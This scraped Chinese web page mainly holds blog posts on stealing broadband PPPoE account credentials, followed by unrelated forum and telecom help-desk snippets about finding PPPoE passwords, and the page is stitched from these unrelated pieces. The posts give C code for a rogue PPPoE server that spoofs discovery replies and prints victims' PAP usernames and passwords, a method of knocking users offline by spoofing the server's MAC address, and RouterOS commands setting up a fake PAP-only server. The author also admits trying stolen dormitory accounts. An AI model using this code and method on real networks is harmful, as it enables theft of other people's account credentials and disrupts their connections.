温馨提示！由于新浪微博认证机制调整，您的新浪微博帐号绑定已过期，请重新绑定！&&|&&
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
协议实现PPPOE连接分为发现阶段（Discovery stage）及会话阶段（PPP Session stage）。发现阶段实现客户端与服务器的互相确认，会话阶段则实现数据通信。完成发现阶段后，会进行LCP协议协商，紧接着便会进行密码确认。发现阶段的PPPOE的code标志代码为0x6388,其过程主要分为以下几个步骤：PPPoE活动发现初始(PADI) 包主机发送PADI（PPPoE Active Discovery Initiation）包，此时目标地址被设置为广播地址。CODE域设置为0x09，同时，SESSION_ID必须被设置为0x0000。&PADI包必须包含正确的、类型为服务名称（Service- Name）的标签，用于指出主机正在请求的服务。也可以包含任意数量的其他标签类型。整个PADI包（包括PPPoE包头），必须不超过1484字节（8位），以便有足够的空间用于中继代理增加中继会话ID（Relay-Session-Id）标签。&PPPoE活动发现提议(PADO) 包当访问集中器接收到它可以提供服务的PADI包，它通过发送一个PADO（PPPoE Active Discovery Offer）包来响应。目标地址是发送PADI的主机的单播地址。CODE域被设置为0x07，同时，SESSION_ID必须被设置为0x0000。&PADO包必须包含一个AC名称（AC-Name）标签，其中有访问集中器的名称；同时，必须包含一个服务名称（Service-Name）标签来标识PADI中的服务名称，同时可以包含任意数量的其他服务名称（Service-Name）标签来指出该访问集中器提供的其他服务。如果该访问集中器不能为这个PADI包提供服务，则它必须不能用PADO做出应答。&PPPoE活动发现请求(PADR) 包因
为PADI是广播包，所以主机可能接收到多个PADO。主机需要审核这些PADO包，并且从中选择一个。这个选择可以基于所提供的AC名称（AC-
Name）或者服务。然后，主机发送PADR（PPPoE Active Discovery
Request）包给被选中的访问集中器。目标地址被设置为这个发送PADO的访问集中器的单播以太网地址。CODE域被设置为0x19，同
时，SESSION_ID必须被设置为0x0000。&PADR包必须包含一个正确的服务名称（Service-Name）标签，该标签指出主机所请求的服务。同时可以包含任意数量的其他标签。&PPPoE活动发现会话确认(PADS) 包当
访问集中器接收到PADR包时，它开始准备开始一个PPP会话。它为PPPoE会话创建一个唯一的会话ID（SESSION_ID），并用
PADS（PPPoE Active Discovery
Session-confirmation）包回复给主机。目标地址域设置为发送PADR的主机的单播以太网地址。CODE域设置为0x65，同
时，SESSION_ID必须设置为刚为本次PPPoE会话创建的唯一值。&PADS包包含一个正确的服务名称（Service-Name）标签，该标签指出这个接收了PPPoE会话的访问集中器的服务。同时可以包含任意数量的其他标签。&如果访问集中器不喜欢PADR中的服务名称，则它必须在回复的PADS中包含服务名称错误（Service-Name-Error）标签（以及任意数量的其他标签）。这时，SESSION_ID必须被设置为0x0000。&PPPoE活动发现终止(PADT) 包这个包可以在会话建立之后的任意时刻发送，用于指出这个PPPoE会话已经被终止。主机或者访问集中器都可以发送这个包。目标地址被设置为单播以太网地址，CODE域被设置为0xa7，SESSION_ID MUST必须设置为将被终止的会话的ID。这个包不需要任何标签。&&当接收到一个PADT（PPPoE Active Discovery Terminate）时，任何使用该会话的PPP通信都是不允许的。在发送或者接收到一个PADT后，即使正常的PPP终止包也必须不再被发送。PPP端应该使用PPP协议本身来关闭一个PPPoE会话，但PADT可以用于PPP不能使用的情况。&LCP发现阶主机相互确认了身份，然后进入会话阶段，进行协议协商阶段(LCP)。大致过程是发送请求包，发送确认包。然后进行密码验证，此过程中帐号密码是明文保存的。协议漏洞要
想进行PPOE连接，客户机首先会发出一个目标MAC地址为FF:FF:FF:FF:FF:FF的广播数据包。PPOE服务器接收到此包，会发送一个含有
自己MAC地址的数据包给客户机告诉其自己的MAC地址。然后两台计算机进行互相通信，发现阶段过后客户机就会提交帐号密码。由
于客户机最初发出的是广播包，局域网内任何一台电脑都可以接收到。当接收到一个PPOE发现数据包，我们如果立即发送一个应答包来假冒PPPOE服务器。
若此欺骗包先于真正的应答包被客户机接收，那么客户机就会认为我们的计算机就是PPOOE服务器，此后的通讯包就会发送到我们的计算机MAC地址上。而由
于PAP密码认证是用明文来传输帐号密码，所以我们就可以轻易通过欺骗客户机来截取其上网密码。以下是关键代码void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data){&&struct tm *&char timestr[16];&time_t local_tv_&MAC_header *mac_&PPP_header *ppp_&PAP_header *pap_&mac_header = (MAC_header *)pkt_&&//发现阶段&if (mac_header-&Type == 0x6388){&&ppp_header = (PPP_header *)((int)mac_header + sizeof(MAC_header));&&if(ppp_header-&code == 0x09){&//客户端请求发现ppp服务器&PADI&&&send_pado_packet(mac_header-&MAC_Source,(INT8U *)ppp_header);&&&&&&puts("开始欺骗！");&&}&&if
(ppp_header-&code == 0x19 &&
mac_header-&MAC_Destination[0] == 0x00 &&
mac_header-&MAC_Destination[1] == 0x03 &&
mac_header-&MAC_Destination[2] == 0x0d &&
mac_header-&MAC_Destination[3] == 0x97 &&
mac_header-&MAC_Destination[4] == 0xfd &&
mac_header-&MAC_Destination[5] == 0x71)&//确定使用此ppp服务器&&PADR&&{&&&puts("欺骗成功！正在建立连接！");&&&cnt = 0;&&&send_pads_packet(mac_header-&MAC_Source,(INT8U&*)ppp_header);&&&send_lcp_request_packet(mac_header-&MAC_Source);&&&&&&&&}&&//exit(0);&}&//会话阶段&if
(mac_header-&Type == 0x6488) //&&
mac_header-&MAC_Source[0] == 0x00 &&
mac_header-&MAC_Source[1] == 0x03 &&
mac_header-&MAC_Source[2] == 0x0d &&
mac_header-&MAC_Source[3] == 0x97 &&
mac_header-&MAC_Source[4] == 0xfd &&
mac_header-&MAC_Source[5] == 0x71)&{&&//printf(".");&&&&ppp_header = (PPP_header *)((int)mac_header + sizeof(MAC_header));&&if (ppp_header-&protocol == 0x21c0 && mac_header-&MAC_Source[5] != 0x71)&//LCP&//回应确认code&&{&&&printf("%d\n\n",*(INT8U *)((int)ppp_header + sizeof(PPP_header)));&&&if (*(INT8U *)((int)ppp_header + sizeof(PPP_header)) == 1){&&&&if (cnt == 1){&&&&&puts("发送确认lcp包");&&&&&send_lcp_ack_packet(mac_header-&MAC_Source,(INT8U *)ppp_header);&&&&&cnt = 0;&&&&}else{&&&&&cnt++;&&&&}&&&&&&&&&&&&}&&&if (*(INT8U *)((int)ppp_header + sizeof(PPP_header)) == 2){&&&&puts("发送拒绝lcp包");&&&&send_lcp_refuse_packet(mac_header-&MAC_Source,(INT8U *)ppp_header);&&&}&&}&&if (ppp_header-&protocol == 0x23c0)&//PAP&&{&&&puts("!!!!!!!!!!!!!!!! \n");&&&pap_header = (PAP_header *)((int)ppp_header + sizeof(PPP_header));&&&printf("帐号：");&&&for (i = 0; i & pap_header-& i++)&&&{&&&&printf("%c", ((char *)pap_header)[sizeof(PAP_header) + i -1]);&&&}&&&&&&printf("\n密码：");&&&&&&for (i = 0; i & 6; i++)&&&{&&&&printf("%c", ((char *)pap_header)[sizeof(PAP_header) + pap_header-&idlen + i]);&&&}&&&puts("");&&&//exit(0);&&}&}}参考资料《TCP/IP详解》《RFC2516--PPPoE协议》《协议分析－&PPPOE Discovery协议解码详解》涉及软件工具：虚拟机，Windows server 2003，wireshark(网络抓包)，RASPPPOE(pppoe协议)等。先说下pppoe连接方式的大概过程：
双击宽带连接，就打开了pppoe的客户端，点击连接，就开始了一系列的发现服务器，验证，确认分配ip等过程。这个实验关键的一步在发现服务器上：客户
端的pppoe连接请求是一个广播，其所在域的pppoe服务器都能收到这个请求，而客户端会选择一个反应最快的服务器作为自己的服务器。现在，这个过程
的漏洞已经出来了，那就是自己搭建pppoe服务器来实现实验目的。搭建pppoe服务器：我用的是Windows server 2003 上的路由和远程访问控制这个组件。首先需在服务器上行安装pppoe协议。 至于具体的操作，网上这个东西已经很多，我自己也是按照网上的步骤弄的，没有什么新意，就不写了，感兴趣的网上搜，这东西一搜一大把。服务器是在虚拟机上搭建的。简单说下实验涉及到的虚拟机两种网络连接方式:nat：这种情况下，主机能上网，虚拟机就能上网。桥接：跟主机的关系是插在同一个交换机上的两台机子。 应该使用这种方式。安装wireshark&：这是个很强大的网络抓包软件，免费，跨平台。安装这个的目的：一个为了测试服务器是否搭建成功，当然最重要就是抓包截获帐号密码。准备工作基本就是这些。当然这中间会碰到很多问题，相应的解决方案网上都能找到，要相信强大的网络资源。服务器配置好，虚拟机开机后，pppoe服务就自动开启，虚拟机就成了pppoe服务器了。打开wireshark，过滤条件选择pppoe。之后就是每隔一段时间过滤数据包，就会有意外发现。下面声明几点：1.本次实验大环境是在宿舍进行，所以在那几天可能会有人上网连接不成功的情况，那可能就是被我的服务器截获了，在此，表示对不起。2.所截获的帐号，都是在晚上熄灯后测试是否正确，所以，白天绝对没有使用截获帐号，这点放心，这是基本的职业道德问题。3.本实验没有任何恶意。实验存在问题：1.在截获方面，现在还是被动的获取，也就是只能等人上网，才能获取到。改进的方案是在局域网内发动ARP攻击，迫使用户掉线，然后就是一大把帐号。2.用户连接到我的服务器后会因为用户名密码不正确还出现691错误代码。原因没有搭建认证服务器。改进的方案是搭建认证服务器，并对用户的数据请求进行转发。朋
友申请了一个帐号，拿来用用，发现ROS（至于怎么样知道用的是ROS，是因为我在网络中抓了几个包，其中就有CDP的包）做得挺好，修改了下来数据的
TTL值（这点很容易发现，随便ping一个外网地址，返回的TTL为0），没办法做简单基于地址转换的代理；ROS内网接口屏蔽了ARP，连他内网地址
也没法访问。我要上网而没帐号怎么办呢。想办法取别人的帐号，要不就是用一虚拟机器，装上ROS把TTL改回来，这样太麻烦。还是取两个帐号用用算了。怎
么样才能取到别人上网的帐号和密码呢？如果大家对PPPOE熟悉的话都知道，PPP协议有个认证过程。认证方式有多种，其中最常见的就是PAP和
CHAP。PAP简单密码认证，发送的是明文的用户名和密码，CHAP称为挑战握手认证，密码不直接在数据包中，而是以密码算散列值。说到这里，如果我要
取别人的帐号密码，就必须让用户把认证的数据发送到我这里来，而且使用PAP认证，我通过抓包可以看到用户名和密码。我的做法是自己在虚拟机里建一ROS
的PPPOE服务器，认证方式仅仅为PAP，现在想办法把数据引到我这里来。思路是首先把用户搞掉线，很容易，以原PPPOE服务器MAC地址为源MAC
地址猛发送数据（任何数据，最好是免费ARP包1ms一次），这样一来，在所有交换机的MAC地址表中的原服务器MAC对应的port为离你最近的端口
（也就是说，所有发往原服务器的数据包都会发到你这里来），导致跟原服务器建立的PPPOE会话将会中断而用户掉线。掉线后，用户会重新拨号，拨号的数据
将会和你所建的PPPOE服务器建立会话，从而可以获取用户名和密码。抓包工具和发包工具都可以使用sniffer软件。几点建议：1、兄弟们在做类似我现在的小区的ROS时注意一下，首先关闭所有不用的服务，这也是任何设备厂商数据设定规范里都会提到的。比如我例子中的CDP（MNDP），在CDP中可以发现其接口地址，主机名等信息。&2、修改TTL值时，不要包括ICMP协议的，一来不容被发现是修改了TTL值的，另一个路由跟踪不了是很老火的事情。&3、网内尽量减小广播域的范围，避免这种攻击造成的面积。4、用户在设置PPPOE拨号客户端不要选择PAP，只选择CHAP，其他的象MSCHAP，如果数据不需要加密一般不用。这样即使象上述的攻击也仅仅导致用 户掉线，当与我PPPOE服务器使用LCP协商认证方式时不会协商成功，从而不会让我截取用户名和密码。5、建立PPPOE拨号客户端时指定服务名（ISP名称），以便不选择其他的PPPOE服务器。进入RouterOS，用户名为：admin，密码为空，然后依次执行如下命令：&&& /interface& print&&& /interface pppoe-server server add interface=ether1 service-name=Fake-PPPoE-Server&&&&&& authentication=pap&&& /interface pppoe-server server print&&& /interface pppoe-server server enable 0&&& /interface pppoe-server server print
阅读(2715)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
loftPermalink:'',
id:'fks_',
blogTitle:'PPPOE欺骗截取上网帐号密码',
blogAbstract:'协议实现',
blogTag:'',
blogUrl:'blog/static/',
isPublished:1,
istop:false,
modifyTime:6,
publishTime:9,
permalink:'blog/static/',
commentCount:0,
mainCommentCount:0,
recommendCount:0,
bsrk:-100,
publisherId:0,
recomBlogHome:false,
currentRecomBlog:false,
attachmentsFileIds:[],
groupInfo:{},
friendstatus:'none',
followstatus:'unFollow',
pubSucc:'',
visitorProvince:'',
visitorCity:'',
visitorNewUser:false,
postAddInfo:{},
mset:'000',
remindgoodnightblog:false,
isBlackVisitor:false,
isShowYodaoAd:false,
hostIntro:'',
hmcon:'1',
selfRecomBlogCount:'0',
lofter_single:''
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人：
{list a as x}
{if !!b&&b.length>0}
他们还推荐了：
{list b as y}
转载记录：
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}盒子中的PPPOE用户名、密码怎么设置
全部答案（共1个回答）
意思是在有网络访问时自动进行婆婆饿拨号连接
1、需要有电信的账户及密码
2、将路由器与电脑用网线连接，网线插在路由的LAN口上，查看路由器设置的登录地址，用户名和密码，这些一般在路由器的底部，一般地址为1...
这是局域网里有一台电脑和你电脑的IP相同.最简就是你的更改IP,或在IP设置那里选择自动获取IP,如果还是不明, Q
在输入框再按一下确定键，会有弹出键盘给你输入
根据您的描述。家庭一般都是ADSL虚拟拨号（也就是PPPOE），选择这项，之后填入电信给您的拨号账号和密码即可。
大家还关注
确定举报此问题
举报原因(必选)：
广告或垃圾信息
激进时政或意识形态话题
不雅词句或人身攻击
侵犯他人隐私
其它违法和不良信息
报告，这不是个问题
报告原因(必选)：
这不是个问题
这个问题分类似乎错了
这个不是我熟悉的地区已被0人收藏
&电信光纤宽带是pppoe吗？用户名密码在哪里？
来自：保密
发帖：377＋1187
好像没密码啊-==kds官方iPhone客户端==-
-------------------------------------------------------------------------------------------
这个家伙很懒，什么也没留下......
...楼主...
来自：保密
发帖：5＋270
即插即用-==kds官方Android客户端==-
-------------------------------------------------------------------------------------------
这个家伙很懒，什么也没留下......
来自：保密
发帖：4＋52
是pppoe，就是你宽带用户名密码可以登录网厅的问10000号。
-==kds官方Android客户端==-
-------------------------------------------------------------------------------------------
这个家伙很懒，什么也没留下......
来自：保密
发帖：99＋447
微信公众号，里面绑定你的宽带，可以查到你的用户名和密码的。我查到后把电信的路由扔了，换了自己的路由，PPPOE拨号上网。
-------------------------------------------------------------------------------------------
这个家伙很懒，什么也没留下......
来自：保密
发帖：97＋3372
设在光猫路由器里
-------------------------------------------------------------------------------------------
这个家伙很懒，什么也没留下......
来自：保密
发帖：378＋1188
是pppoe，就是你宽带用户名密码可以登录网厅的问10000号。 -==kds官方Android客户端==- 引用自2楼:山上有座庙(snoopyhzy)
安装的时候不告知吗？好像没有啊-==kds官方iPhone客户端==-
-------------------------------------------------------------------------------------------
这个家伙很懒，什么也没留下......
首先，请你以一种，团成一个团的姿势，然后，慢慢地比较圆润的方式，离开这座让你讨厌的城市，或者讨厌的人的周围首先，请你以一种，团成一个团的姿势，然后，慢慢地比较圆润的方式，离开这座让你讨厌的城市，或者讨厌的人的周围
电信光纤宽带是pppoe吗？用户名密码在哪里？
扫描关注官方微信
扫描下载客户端
你可以发私信给一个或多个听众。默认不能发给非听众，除非对方设置了允许。
奖励分值：您今日还有 3 点分值可以奖励 [ 20 点奖分可自动换取 1 点PP]
请输入4位有相同表情的数字
&违反国家法律&&&&&&&&&含有色情内容
&对他人进行恶意攻击
&散布广告以及其它商业化的宣传
&干扰或混乱kds宽带山网络服务
&发布任何包含种族、 性别、宗教歧视性和猥亵性的信息内容
&恶意刷屏&&&&&&&&&&&&&&&内容重复&&&&&&&&&&&&&&&攻击管理员
&本人要求删除&&&&&&&&当事人要求删除
&与主题无关&&&&&&&&&&&水贴软文&&&&&&&&&&&涉及敏感政治内容
&被要求删除，你懂的&&&&&&&&&&&盗号并发布违规或广告内容
扣除hp值：
宽带山警务室
&恶意刷屏&&&&&&&&&水贴软文
&违反国家法律
&含有色情内容
&对他人进行恶意攻击
&散布广告以及其它商业化的宣传
&干扰或混乱kds宽带山网络服务
&发布任何包含种族、 性别、宗教歧视性和猥亵性的信息内容
&网页不能打开
&图片不能显示
已报名参加的人员:欢迎来到中国电信10000知道搜索门户
<input type="hidden" name="SSORequestXML" value="CAP0100219850356663587/login.do">
请选择您想要切换的城市/省份：A-GH-HI-NO-TU-Z
当前位置： &&&&&&问题详情
').appendTo($("body"));
//ajaxCallIdea();
//加载意见征集页面
function ajaxCallIdea(){
type:"GET",
url:"/idxmanager/idea/idea_show.html",
dataType:"html",
success:function(dom){
$(dom).appendTo($("body"));
//查询是否有注册有礼活动
function ajaxHasZCYL(){
type:"GET",
url:"getRegistZcylInfo.do",
success:function(msg){
if(msg&&msg!="0"){
'').appendTo($("body"));
//ajaxCallZCYL();
var info = $.trim(msg);
var reward = info.split("|");
if(reward.length==2){
var tp = reward[0];
var tv = reward[1];
//加载注册有礼页面
function ajaxCallZCYL(){
type:"GET",
url:"/idxmanager/idea/zcyl_show.html",
dataType:"html",
success:function(dom){
$(dom).appendTo($("body"));
我无意将ITV机顶盒设置重置了，重新设置不知道业务账号和密码。
wx9594747| &悬赏分：
0分 | &提问时间： 22:16| &浏览20242次 | &问题归属地：
以下答案是否解决了您的问题？22 &分享到：
您好！使用ITV遥控器对准机顶盒，按设置键，选择系统设置，输入密码6321，选择PPPOE或者DHCP，输入用户名+@vod和密码，然后输入业务账号和密码，点击确定后，重新启动机顶盒。具体操作方式详见：http://189.io/migkdV如不能处理，您可以直接拨打电信客服热线10000号，或者电脑添加电信QQ 客服为好友，（QQ号：）点击人工帮助，寻求在线帮助。
推荐时间: 08:51<span style="margin-right:20" id="point
回答者：夜雨知秋
回答时间： 15:14
其他回答&共1条
你好，账号密码忘记建议添加QQ客服或者直接拨打当地10000号咨询下客服吧，希望能帮到你。
<span style="margin-right:20" id="point回答者：我勒个去 | 回答时间： 08:32